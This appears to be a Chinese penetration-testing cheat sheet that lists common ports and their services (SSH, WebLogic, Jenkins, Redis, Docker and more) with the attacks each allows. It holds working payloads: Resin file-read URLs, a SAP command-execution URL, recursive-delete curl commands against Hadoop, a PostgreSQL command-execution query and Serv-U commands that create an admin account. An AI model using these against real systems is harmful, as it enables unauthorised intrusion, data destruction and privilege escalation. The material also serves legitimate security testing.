面對一個(gè)目標(biāo)主機(jī)時(shí)，我們往往通過端口掃描來了解目標(biāo)主機(jī)開放的端口和服務(wù)。當(dāng)看到一個(gè)端口號時(shí)，你是否已經(jīng)猜到它是什么服務(wù)，以及它可能存在哪些安全漏洞和利用姿勢呢？

今天分享一些常見的端口服務(wù)及漏洞利用，幫助你快速找到獲取主機(jī)權(quán)限的攻擊路徑。

1、遠(yuǎn)程管理端口

22 端口（SSH）

安全攻擊：弱口令、暴力猜解、用戶名枚舉

利用方式：

1、通過用戶名枚舉可以判斷某個(gè)用戶名是否存在于目標(biāo)主機(jī)中，

2、利用弱口令/暴力破解，獲取目標(biāo)主機(jī)權(quán)限。

23 端口（Telnet）

安全漏洞：弱口令、明文傳輸

利用方式：

1、通過弱口令或暴力破解，獲取目標(biāo)主機(jī)權(quán)限。

2、嗅探抓取telnet明文賬戶密碼。

3389 端口（RDP）

安全漏洞：暴力破解

利用方式：通過弱口令或暴力破解，獲取目標(biāo)主機(jī)權(quán)限。

5632 端口（Pcanywhere）

安全漏洞：弱口令、暴力破解

利用方式：通過弱口令或暴力破解，獲取目標(biāo)主機(jī)權(quán)限

5900 端口（VNC）

安全漏洞：弱口令、暴力破解

利用方式：通過弱口令或暴力破解，獲取目標(biāo)主機(jī)權(quán)限。

2、Web中間件/服務(wù)端口

1090/1099 端口（RMI）

安全漏洞：JAVA RMI 反序列化遠(yuǎn)程命令執(zhí)行漏洞

利用方式：使用nmap檢測端口信息。

端口信息：1099/1090? ? Java-rmi? ? Java RMI Registry

檢測工具：attackRMI.jar

7001 端口（Weblogic）

安全漏洞：弱口令、SSRF、反序列化漏洞

利用方式：

1、控制臺弱口令上傳war木馬

2、SSRF內(nèi)網(wǎng)探測

3、反序列化遠(yuǎn)程代碼執(zhí)行等

8000 端口（jdwp）

安全漏洞：JDWP 遠(yuǎn)程命令執(zhí)行漏洞

端口信息：

? ? ? 8000? ? ? ? ? ? jdwp? ? ? ? ? java Debug Wire Protocol

檢測工具：https://github.com/IOActive/jdwp-shellifier

8080 端口（Tomcat）

安全漏洞：弱口令、示例目錄

利用方式：通過弱口令登錄控制臺，上傳war包。

8080 端口（Jboss）

安全漏洞：未授權(quán)訪問、反序列化。

利用方式：

1、未授權(quán)訪問控制臺，遠(yuǎn)程部署木馬

2、反序列化導(dǎo)致遠(yuǎn)程命令執(zhí)行等。

檢測工具：https://github.com/joaomatosf/jexboss

8080 端口（Resin）

安全漏洞：目錄遍歷、遠(yuǎn)程文件讀取

利用方式：通過目錄遍歷/遠(yuǎn)程文件讀取獲取敏感信息，為進(jìn)一步攻擊提供必要的信息。

任意文件讀取POC：

payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"

payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"

payload3 = "/ ..\\\\web-inf"

8080 端口（Jetty）

安全漏洞：遠(yuǎn)程共享緩沖區(qū)泄漏

利用方式：攻擊者可以通過精心構(gòu)造headers值來觸發(fā)異常并偏移到共享緩沖區(qū)，其中包含了之前其他用戶提交的請求，服務(wù)器會(huì)根據(jù)攻擊者的payload返回特定位置的數(shù)據(jù)。

檢測工具：https://github.com/GDSSecurity/Jetleak-Testing-Script

8080 端口（GlassFish）

安全漏洞：弱口令、任意文件讀取

利用方式：

1、弱口令admin/admin，直接部署shell

2、任意文件讀取獲取服務(wù)器敏感配置信息

8080 端口（Jenkins）

安全漏洞：未授權(quán)訪問 、遠(yuǎn)程代碼執(zhí)行

利用方式：訪問如下url，可以執(zhí)行腳本命令，反彈shell，寫入webshell等。

http://<target>:8080/manage

http://<target>:8080/script

8161 端口（ActiveMQ）

安全漏洞：弱口令、任意文件寫入、反序列化

利用方式：默認(rèn)密碼admin/admin登陸控制臺、寫入webshell、上傳ssh key等方式。

9043 端口（webSphere）

安全漏洞：控制臺弱口令、遠(yuǎn)程代碼執(zhí)行

后臺地址：https://:9043/ibm/console/logon.jsp

50000 端口 （SAP）

安全漏洞：遠(yuǎn)程代碼執(zhí)行

利用方式：攻擊者通過構(gòu)造url請求，實(shí)現(xiàn)遠(yuǎn)程代碼執(zhí)行。

POC:http://<target>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all

50070 端口（hadoop）

安全漏洞：未授權(quán)訪問

利用方式：攻擊者可以通過命令行操作多個(gè)目錄下的數(shù)據(jù)，如進(jìn)行刪除操作。

curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“

curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“

3、數(shù)據(jù)庫端口

389 端口（ldap）

安全漏洞：未授權(quán)訪問 、弱口令

利用方式：通過LdapBrowser工具直接連入。

1433 端口（Mssql）

安全漏洞：弱口令、暴力破解

利用方式：差異備份getshell、SA賬戶提權(quán)等

1521 端口（Oracle）

安全漏洞：弱口令、暴力破解

利用方式：通過弱口令/暴力破解進(jìn)行入侵。

3306 端口（MySQL）

安全漏洞：弱口令、暴力破解

利用方式：利用日志寫入webshell、udf提權(quán)、mof提權(quán)等。

5432 端口（ PostgreSQL）

安全漏洞：弱口令、高權(quán)限命令執(zhí)行

利用方式：攻擊者通過弱口令獲取賬號信息，連入postgres中，可執(zhí)行系統(tǒng)命令。。

PoC參考：

? ? DROP TABLE IF EXISTS cmd_exec;

? ? CREATE TABLE cmd_exec(cmd_output text);

? ? COPY cmd_exec FROM PROGRAM 'id';

? ? SELECT * FROM cmd_exec;

5984 端口（CouchDB）

安全漏洞：垂直權(quán)限繞過、任意命令執(zhí)行

利用方式：通過構(gòu)造數(shù)據(jù)創(chuàng)建管理員用戶，使用管理員用戶登錄，構(gòu)造惡意請求觸發(fā)任意命令執(zhí)行。

后臺訪問：http://<target>:5984/_utils

6379 端口（Redis）

安全漏洞：未授權(quán)訪問

利用方式：絕對路徑寫webshell 、利用計(jì)劃任務(wù)執(zhí)行命令反彈shell、

公私鑰認(rèn)證獲取root權(quán)限、主從復(fù)制RCE等。

9200 端口（elasticsearch）

安全漏洞：未授權(quán)訪問、命令執(zhí)行

檢測方式：

1、直接訪問如下url，獲取相關(guān)敏感信息。

? http://<target>:9200/_nodes? 查看節(jié)點(diǎn)數(shù)據(jù)

? http://<target>:9200/_river? 查看數(shù)據(jù)庫敏感信息

2、通過構(gòu)造特定的數(shù)據(jù)包，執(zhí)行任意命令。

11211 端口（MemCache）

安全漏洞：未授權(quán)訪問

檢測方式：無需用戶名密碼，可以直接連接memcache 服務(wù)的11211端口。

nc -vv <target> 11211

27017 端口（Mongodb）

安全漏洞：未授權(quán)訪問、弱口令

利用方式：未授權(quán)訪問/弱口令，遠(yuǎn)程連入數(shù)據(jù)庫，導(dǎo)致敏感信息泄露。

4、常見協(xié)議端口

21 端口（FTP)

安全漏洞：1、配置不當(dāng)? ? 2、明文傳輸? ? 3、第三方軟件提權(quán)

利用方式：

1、匿名登錄或弱口令

2、嗅探ftp用戶名和密碼

3、Serv-U權(quán)限較大的賬號可導(dǎo)致系統(tǒng)命令執(zhí)行。FTP提權(quán)命令：

? # 增加系統(tǒng)用戶

? Quote site exec net user 4567 4567 /add

? # 提升到管理員權(quán)限

? Quote site exec net localgroup administrators 4567 /add

25 端口（SMTP）

攻擊方式：1、匿名發(fā)送郵件 2、弱口令 3、SMTP用戶枚舉

利用方式：

1、SMTP服務(wù)器配置不當(dāng)，攻擊者可以使用任意用戶發(fā)送郵件。

2、SMTP弱口令掃描，獲取用戶賬號密碼，發(fā)送郵件釣魚。

3、通過SMTP用戶枚舉獲取用戶名：

? nmap -p 25 -- smtp-enum-users.nse <target>

53 端口（DNS）

安全攻擊：1、DNS域傳送漏洞、DNS欺騙、DNS緩存投毒

檢測方式：

1、DNS域傳送漏洞，Windows下檢測使用nslookup命令，Linux下檢測使用dig命令，通過執(zhí)行命令可以清楚的看到域名解析情況。

2、DNS欺騙就是攻擊者冒充域名服務(wù)器的一種欺騙行為。

3、DNS緩存投毒是攻擊者欺騙DNS服務(wù)器相信偽造的DNS響應(yīng)的真實(shí)性。

161 端口（SNMP）

安全漏洞：默認(rèn)團(tuán)體名/弱口令訪問

利用方式：通過nmap自帶的審計(jì)腳本進(jìn)行檢測，可能導(dǎo)致敏感信息泄露。。

1、弱口令檢測：nmap –sU –p161 –script=snmp-brute <target>

2、獲取系統(tǒng)信息：nmap –sU –p161 –script=snmp-sysdescr <target>

3、獲取用戶信息：nmap -sU -p161 --script=snmp-win32-user <target>

4、獲取網(wǎng)絡(luò)端口狀態(tài)：nmap -sU -p161 --script=snmp-netstat <target>

443 端口（SSL）

安全漏洞：OpenSSL 心臟出血

利用方式：攻擊者可以遠(yuǎn)程讀取存在漏洞版本的openssl服務(wù)器內(nèi)存中長大64K的數(shù)據(jù)。

掃描腳本：nmap -sV --script=ssl-heartbleed <target>

445 端口（SMB）

安全漏洞：信息泄露、遠(yuǎn)程代碼執(zhí)行

利用方式：可利用共享獲取敏感信息、緩沖區(qū)溢出導(dǎo)致遠(yuǎn)程代碼執(zhí)行，如ms17010。

873 端口（Rsync）

安全漏洞：匿名訪問、弱口令

利用方式：攻擊者可以執(zhí)行下載/上傳等操作，也可以嘗試上傳webshell。

1、下載：#rsync -avz a.b.c.d::path/file path/filiname?

2、上傳：#rsync -avz path/filename a.b.c.d::path/file

2181 端口（Zookeeper）

安全漏洞：未授權(quán)訪問

檢測方式：攻擊者可通過執(zhí)行envi命令獲得系統(tǒng)大量的敏感信息，包括系統(tǒng)名稱、Java環(huán)境。

echo envi | nc ip port

2375 端口（Docker）

安全漏洞：未授權(quán)方式

檢測方式：通過docker daemon api 執(zhí)行docker命令。

#列出容器信息，效果與docker ps -a 一致。

curl http://<target>:2375/containers/json

docker -H tcp://<target>:2375 start <Container Id>